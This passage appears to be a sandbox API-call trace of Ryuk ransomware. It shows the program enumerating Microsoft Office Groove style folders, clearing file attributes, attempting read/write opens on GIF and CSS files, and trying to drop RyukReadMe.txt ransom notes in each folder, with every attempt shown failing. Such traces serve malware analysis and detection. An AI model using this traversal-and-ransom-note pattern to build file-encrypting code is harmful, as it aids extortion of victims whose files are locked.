SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.223] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.223] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.223] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.224] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.224] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.224] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.224] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.224] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.224] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.224] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.225] SetLastError (dwErrCode=0x0) [0137.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.225] GetLastError () returned 0x5 [0137.225] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.225] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.225] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css", dwFileAttributes=0x80) returned 0 [0137.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.225] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.225] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.225] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css", dwFileAttributes=0x80) returned 0 [0137.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\greentea.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.226] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.226] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css", dwFileAttributes=0x80) returned 0 [0137.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lightspirit.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.227] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.227] SetLastError (dwErrCode=0x0) [0137.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.227] GetLastError () returned 0x5 [0137.227] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.227] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.227] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.227] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.227] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.227] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.228] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.228] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.228] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.228] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.228] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.228] SetLastError (dwErrCode=0x0) [0137.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.228] GetLastError () returned 0x5 [0137.228] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.229] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.229] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime.css", dwFileAttributes=0x80) returned 0 [0137.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.229] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.229] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.229] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Maroon.css", dwFileAttributes=0x80) returned 0 [0137.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\maroon.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.230] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.230] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.230] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.230] SetLastError (dwErrCode=0x0) [0137.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.230] GetLastError () returned 0x5 [0137.230] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.230] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.230] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.230] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.230] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.231] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.231] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.231] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.231] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.231] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.231] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.232] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.232] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.232] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.232] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.232] SetLastError (dwErrCode=0x0) [0137.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.232] GetLastError () returned 0x5 [0137.232] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.232] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.232] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.232] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css", dwFileAttributes=0x80) returned 0 [0137.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.233] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.233] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.233] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css", dwFileAttributes=0x80) returned 0 [0137.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\olivegreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.233] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.234] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.234] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css", dwFileAttributes=0x80) returned 0 [0137.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\premium.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.235] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.235] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.235] SetLastError (dwErrCode=0x0) [0137.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.235] GetLastError () returned 0x5 [0137.235] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.235] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.235] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.235] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.235] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.236] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.236] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.236] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.236] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.236] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.236] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.236] SetLastError (dwErrCode=0x0) [0137.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.236] GetLastError () returned 0x5 [0137.237] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.237] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.237] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: 